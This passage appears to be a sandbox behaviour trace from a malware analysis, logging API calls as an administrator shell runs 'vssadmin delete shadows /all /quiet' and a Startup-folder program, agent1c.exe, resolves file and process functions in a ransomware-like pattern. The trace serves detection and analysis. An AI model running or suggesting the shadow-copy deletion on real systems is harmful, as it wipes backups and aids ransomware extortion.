CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee364, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0032.752] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.752] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.752] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.752] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee366, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0032.752] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.752] GetFileType (hFile=0xe8) returned 0x3 [0032.752] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.752] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.752] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.752] GetFileType (hFile=0xf4) returned 0x3 [0032.752] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.752] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="vssadmin delete shadows /all /quiet\n", cchWideChar=-1, lpMultiByteStr=0x4a8ec320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vssadmin delete shadows /all /quiet\n", lpUsedDefaultChar=0x0) returned 37 [0032.752] WriteFile (in: hFile=0xf4, lpBuffer=0x4a8ec320*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x19f988, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesWritten=0x19f988*=0x24, lpOverlapped=0x0) returned 1 [0032.752] GetProcessHeap () returned 0x220000 [0032.752] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x4012) returned 0x23f630 [0032.753] GetProcessHeap () returned 0x220000 [0032.753] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x23f630 | out: hHeap=0x220000) returned 1 [0032.753] GetProcessHeap () returned 0x220000 [0032.753] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xb0) returned 0x2397e0 [0032.753] GetProcessHeap () returned 0x220000 [0032.753] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x22) returned 0x234610 [0032.753] GetProcessHeap () returned 0x220000 [0032.753] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x48) returned 0x23aa90 [0032.754] GetConsoleOutputCP () returned 0x4e3 [0032.754] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x4a8ebfe0 | out: lpCPInfo=0x4a8ebfe0) returned 1 [0032.754] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0032.754] GetConsoleTitleW (in: lpConsoleTitle=0x19f940, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0032.754] GetProcessHeap () returned 0x220000 [0032.754] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x218) returned 0x239910 [0032.754] GetProcessHeap () returned 0x220000 [0032.754] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x5a) returned 0x239b30 [0032.754] GetProcessHeap () returned 0x220000 [0032.754] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x420) returned 0x239090 [0032.754] SetErrorMode (uMode=0x0) returned 0x0 [0032.754] SetErrorMode (uMode=0x1) returned 0x0 [0032.754] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2390a0, lpFilePart=0x19f1d0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x19f1d0*="Desktop") returned 0x25 [0032.754] SetErrorMode (uMode=0x0) returned 0x1 [0032.754] GetProcessHeap () returned 0x220000 [0032.754] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x239090, Size=0x6e) returned 0x239090 [0032.754] GetProcessHeap () returned 0x220000 [0032.754] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x239090) returned 0x6e [0032.754] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a8df360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0032.754] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0032.755] GetProcessHeap () returned 0x220000 [0032.755] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x128) returned 0x235b70 [0032.755] GetProcessHeap () returned 0x220000 [0032.755] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x240) returned 0x221ab0 [0032.755] GetProcessHeap () returned 0x220000 [0032.755] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x221ab0, Size=0x12a) returned 0x221ab0 [0032.755] GetProcessHeap () returned 0x220000 [0032.755] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x221ab0) returned 0x12a [0032.755] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a8df360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0032.755] GetProcessHeap () returned 0x220000 [0032.755] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xe8) returned 0x239db0 [0032.755] GetProcessHeap () returned 0x220000 [0032.755] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x239db0, Size=0x7e) returned 0x239db0 [0032.755] GetProcessHeap () returned 0x220000 [0032.755] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x239db0) returned 0x7e [0032.755] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0032.755] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x19ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19ef40) returned 0xffffffffffffffff [0032.755] GetLastError () returned 0x2 [0032.755] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x19ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19ef40) returned 0xffffffffffffffff [0032.755] GetLastError () returned 0x2 [0032.755] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0032.755] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x19ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19ef40) returned 0x239ba0 [0032.755] FindClose (in: hFindFile=0x239ba0 | out: hFindFile=0x239ba0) returned 1 [0032.756] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x19ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19ef40) returned 0xffffffffffffffff [0032.756] GetLastError () returned 0x2 [0032.756] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x19ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19ef40) returned 0x239ba0 [0032.756] FindClose (in: hFindFile=0x239ba0 | out: hFindFile=0x239ba0) returned 1 [0032.756] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0032.756] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0032.756] GetConsoleTitleW (in: lpConsoleTitle=0x19f490, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0032.756] GetProcessHeap () returned 0x220000 [0032.756] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x21c) returned 0x239110 [0032.756] GetConsoleTitleW (in: lpConsoleTitle=0x239120, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0032.756] GetProcessHeap () returned 0x220000 [0032.756] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x239110, Size=0xc0) returned 0x239110 [0032.756] GetProcessHeap () returned 0x220000 [0032.756] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x239110) returned 0xc0 [0032.756] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe - vssadmin delete shadows /all /quiet") returned 1 [0032.757] GetProcessHeap () returned 0x220000 [0032.757] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x239110 | out: hHeap=0x220000) returned 1 [0032.757] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f248, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f208 | out: lpAttributeList=0x19f248, lpSize=0x19f208) returned 1 [0032.757] UpdateProcThreadAttribute (in: lpAttributeList=0x19f248, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f1f8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f248, lpPreviousValue=0x0) returned 1 [0032.757] GetStartupInfoW (in: lpStartupInfo=0x19f360 | out: lpStartupInfo=0x19f360*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xe8, hStdOutput=0xf4, hStdError=0xf4)) [0032.757] GetProcessHeap () returned 0x220000 [0032.757] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x20) returned 0x234640 [0032.757] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0032.757] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0032.757] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0032.757] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0032.757] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0032.757] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0032.757] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0032.757] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0032.757] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0032.757] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0032.757] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0032.757] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0032.757] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0032.757] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0032.757] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0032.757] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0032.758] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0032.758] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0032.758] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0032.758] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0032.758] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0032.758] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0032.758] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0032.758] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0032.758] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0032.758] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0032.758] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0032.758] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0032.758] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0032.758] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0032.758] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0032.758] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0032.758] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0032.758] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0032.758] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0032.758] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0032.758] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0032.758] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0032.758] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0032.758] GetProcessHeap () returned 0x220000 [0032.758] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x234640 | out: hHeap=0x220000) returned 1 [0032.758] GetProcessHeap () returned 0x220000 [0032.758] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x12) returned 0x238900 [0032.758] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x19f280*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin delete shadows /all /quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f230 | out: lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessInformation=0x19f230*(hProcess=0x50, hThread=0x54, dwProcessId=0xae0, dwThreadId=0xae4)) returned 1 [0032.764] CloseHandle (hObject=0x54) returned 1 [0032.764] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0032.765] GetProcessHeap () returned 0x220000 [0032.765] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x23eb10 | out: hHeap=0x220000) returned 1 [0032.765] GetEnvironmentStringsW () returned 0x23eb10* [0032.765] GetProcessHeap () returned 0x220000 [0032.765] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xb0e) returned 0x23f630 [0032.765] FreeEnvironmentStringsW (penv=0x23eb10) returned 1 [0032.765] NtQueryInformationProcess (in: ProcessHandle=0x50, ProcessInformationClass=0x0, ProcessInformation=0x19eb38, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x19eb38, ReturnLength=0x0) returned 0x0 [0032.765] ReadProcessMemory (in: hProcess=0x50, lpBaseAddress=0x7fffffd5000, lpBuffer=0x19eb70, nSize=0x380, lpNumberOfBytesRead=0x19eb30 | out: lpBuffer=0x19eb70*, lpNumberOfBytesRead=0x19eb30*=0x380) returned 1 [0032.765] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) Process: id = "3" image_name = "mode.com" filename = "c:\\windows\\system32\\mode.com" page_root = "0x50232000" os_pid = "0xac0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa84" cmd_line = "mode con cp select=1251" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 13 os_tid = 0xac4 Process: id = "4" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x4ed43000" os_pid = "0xae0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa84" cmd_line = "vssadmin delete shadows /all /quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 20 os_tid = 0xae4 Thread: id = 21 os_tid = 0xae8 Thread: id = 22 os_tid = 0xaec Thread: id = 23 os_tid = 0xaf0 Thread: id = 24 os_tid = 0xaf4 Process: id = "5" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x4a071000" os_pid = "0xaf8" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0xae0" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:00078ce1" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 27 os_tid = 0xbb4 Thread: id = 28 os_tid = 0xbb0 Thread: id = 29 os_tid = 0xba8 Thread: id = 30 os_tid = 0xb9c [0042.598] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xe1db10 | out: lpSystemTimeAsFileTime=0xe1db10*(dwLowDateTime=0xb5f100a0, dwHighDateTime=0x1d5246c)) [0042.598] GetCurrentProcessId () returned 0xaf8 [0042.599] GetCurrentThreadId () returned 0xb9c [0042.599] GetTickCount () returned 0x1a5fe [0042.599] QueryPerformanceCounter (in: lpPerformanceCount=0xe1db18 | out: lpPerformanceCount=0xe1db18*=16290756808) returned 1 [0042.599] malloc (_Size=0x100) returned 0x678e80 Thread: id = 31 os_tid = 0xb98 Thread: id = 32 os_tid = 0xb08 Thread: id = 33 os_tid = 0xb00 Thread: id = 34 os_tid = 0xafc Thread: id = 35 os_tid = 0xbd0 Thread: id = 42 os_tid = 0x848 Thread: id = 43 os_tid = 0x53c Process: id = "6" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x45176000" os_pid = "0xbb8" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0xaf8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:000799ce" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 36 os_tid = 0xbd4 Thread: id = 37 os_tid = 0xbcc Thread: id = 38 os_tid = 0xbc8 Thread: id = 39 os_tid = 0xbc4 Thread: id = 40 os_tid = 0xbc0 Thread: id = 41 os_tid = 0xbbc Thread: id = 44 os_tid = 0x5b0 Process: id = "7" image_name = "agent1c.exe" filename = "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\agent1c.exe" page_root = "0x76992000" os_pid = "0x4e8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\agent1c.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e105" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 45 os_tid = 0x4ec [0256.830] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x74da0000 [0256.831] GetProcAddress (hModule=0x74da0000, lpProcName="GetProcAddress") returned 0x74db1222 [0256.831] GetProcAddress (hModule=0x74da0000, lpProcName="GetModuleHandleW") returned 0x74db34b0 [0256.831] GetProcAddress (hModule=0x74da0000, lpProcName="FindNextFileW") returned 0x74db54ee [0256.831] GetProcAddress (hModule=0x74da0000, lpProcName="FindClose") returned 0x74db4442 [0256.831] GetProcAddress (hModule=0x74da0000, lpProcName="MoveFileW") returned 0x74dc9af0 [0256.831] GetProcAddress (hModule=0x74da0000, lpProcName="GetFileSizeEx") returned 0x74db59e2 [0256.831] GetProcAddress (hModule=0x74da0000, lpProcName="GetModuleFileNameW") returned 0x74db4950 [0256.831] GetProcAddress (hModule=0x74da0000, lpProcName="GetFileAttributesW") returned 0x74db1b18 [0256.831] GetProcAddress (hModule=0x74da0000, lpProcName="ExitProcess") returned 0x74db7a10 [0256.831] GetProcAddress (hModule=0x74da0000, lpProcName="GetCommandLineW") returned 0x74db5223 [0256.831] GetProcAddress (hModule=0x74da0000, lpProcName="GetComputerNameW") returned 0x74dbdd0e [0256.831] GetProcAddress (hModule=0x74da0000, lpProcName="GetComputerNameA") returned 0x74dcb6e0 [0256.831] GetProcAddress (hModule=0x74da0000, lpProcName="CreateMutexW") returned 0x74db424c [0256.831] GetProcAddress (hModule=0x74da0000, lpProcName="lstrlenW") returned 0x74db1700 [0256.831] GetProcAddress (hModule=0x74da0000, lpProcName="lstrlenA") returned 0x74db5a4b [0256.832] GetProcAddress (hModule=0x74da0000, lpProcName="GetCurrentProcess") returned 0x74db1809 [0256.832] GetProcAddress (hModule=0x74da0000, lpProcName="WaitForSingleObject") returned 0x74db1136 [0256.832] GetProcAddress (hModule=0x74da0000, lpProcName="GetLogicalDrives") returned 0x74db5371 [0256.832] GetProcAddress (hModule=0x74da0000, lpProcName="GetTickCount") returned 0x74db110c [0256.832] GetProcAddress (hModule=0x74da0000, lpProcName="DeleteFileW") returned 0x74db89b3 [0256.832] GetProcAddress (hModule=0x74da0000, lpProcName="WideCharToMultiByte") returned 0x74db170d [0256.832] GetProcAddress (hModule=0x74da0000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x74db1916 [0256.832] GetProcAddress (hModule=0x74da0000, lpProcName="Sleep") returned 0x74db10ff [0256.832] GetProcAddress (hModule=0x74da0000, lpProcName="LeaveCriticalSection") returned 0x77202270 [0256.832] GetProcAddress (hModule=0x74da0000, lpProcName="ReadFile") returned 0x74db3ed3 [0256.832] GetProcAddress (hModule=0x74da0000, lpProcName="CreateFileW") returned 0x74db3f5c [0256.832] GetProcAddress (hModule=0x74da0000, lpProcName="OpenMutexW") returned 0x74db5151 [0256.832] GetProcAddress (hModule=0x74da0000, lpProcName="EnterCriticalSection") returned 0x772022b0 [0256.832] GetProcAddress (hModule=0x74da0000, lpProcName="WaitForMultipleObjects") returned 0x74db4220 [0256.832] GetProcAddress (hModule=0x74da0000, lpProcName="lstrcmpiW") returned 0x74dcd5cd [0256.832] GetProcAddress (hModule=0x74da0000, lpProcName="lstrcmpiA") returned 0x74db3e8e [0256.832] GetProcAddress (hModule=0x74da0000, lpProcName="DeleteCriticalSection") returned 0x772145f5 [0256.832] GetProcAddress (hModule=0x74da0000, lpProcName="ReleaseMutex") returned 0x74db111e [0256.832] GetProcAddress (hModule=0x74da0000, lpProcName="CloseHandle") returned 0x74db1410 [0256.832] GetProcAddress (hModule=0x74da0000, lpProcName="GetVersion") returned 0x74db4467 [0256.832] GetProcAddress (hModule=0x74da0000, lpProcName="CreateThread") returned 0x74db34d5 [0256.832] GetProcAddress (hModule=0x74da0000, lpProcName="ExpandEnvironmentStringsW") returned 0x74db4173 [0256.832] GetProcAddress (hModule=0x74da0000, lpProcName="QueryPerformanceCounter") returned 0x74db1725 [0256.833] GetProcAddress (hModule=0x74da0000, lpProcName="QueryPerformanceFrequency") returned 0x74db41f0 [0256.833] GetProcAddress (hModule=0x74da0000, lpProcName="GetCurrentProcessId") returned 0x74db11f8 [0256.833] GetProcAddress (hModule=0x74da0000, lpProcName="SetFileAttributesW") returned 0x74dcd4f7 [0256.833] GetProcAddress (hModule=0x74da0000, lpProcName="GetVolumeInformationW") returned 0x74dcc860 [0256.833] GetProcAddress (hModule=0x74da0000, lpProcName="WriteFile") returned 0x74db1282 [0256.833] GetProcAddress (hModule=0x74da0000, lpProcName="SetFilePointerEx") returned 0x74dcc807 [0256.833] GetProcAddress (hModule=0x74da0000, lpProcName="SetEndOfFile") returned 0x74dcce2e [0256.833] GetProcAddress (hModule=0x74da0000, lpProcName="FindFirstFileW") returned 0x74db4435 [0256.833] GetProcAddress (hModule=0x74da0000, lpProcName="GetProcessHeap") returned 0x74db14e9 [0256.833] GetProcAddress (hModule=0x74da0000, lpProcName="HeapReAlloc") returned 0x77221f6e [0256.833] GetProcAddress (hModule=0x74da0000, lpProcName="HeapAlloc") returned 0x7720e026 [0256.833] GetProcAddress (hModule=0x74da0000, lpProcName="HeapFree") returned 0x74db14c9 [0256.833] GetProcAddress (hModule=0x74da0000, lpProcName="CreatePipe") returned 0x74e3415b [0256.833] GetProcAddress (hModule=0x74da0000, lpProcName="SetHandleInformation") returned 0x74dc195c [0256.833] GetProcAddress (hModule=0x74da0000, lpProcName="CreateProcessW") returned 0x74db103d [0256.833] GetProcAddress (hModule=0x74da0000, lpProcName="CompareStringW") returned 0x74db3bca [0256.833] GetProcAddress (hModule=0x74da0000, lpProcName="CompareStringA") returned 0x74db3c5a [0256.833] GetProcAddress (hModule=0x74da0000, lpProcName="OpenProcess") returned 0x74db1986 [0256.833] GetProcAddress (hModule=0x74da0000, lpProcName="TerminateProcess") returned 0x74dcd802 [0256.833] GetProcAddress (hModule=0x74da0000, lpProcName="GetSystemTime") returned 0x74db5a96 [0256.833] GetProcAddress (hModule=0x74da0000, lpProcName="SystemTimeToFileTime") returned 0x74db5a7e [0256.833] GetProcAddress (hModule=0x74da0000, lpProcName="GetLastError") returned 0x74db11c0 [0256.833] GetProcAddress (hModule=0x74da0000, lpProcName="CreateToolhelp32Snapshot") returned 0x74dd735f [0256.834] GetProcAddress (hModule=0x74da0000, lpProcName="Process32NextW") returned 0x74dd896c [0256.834] GetProcAddress (hModule=0x74da0000, lpProcName="Process32FirstW") returned 0x74dd8baf [0256.834] LoadLibraryA 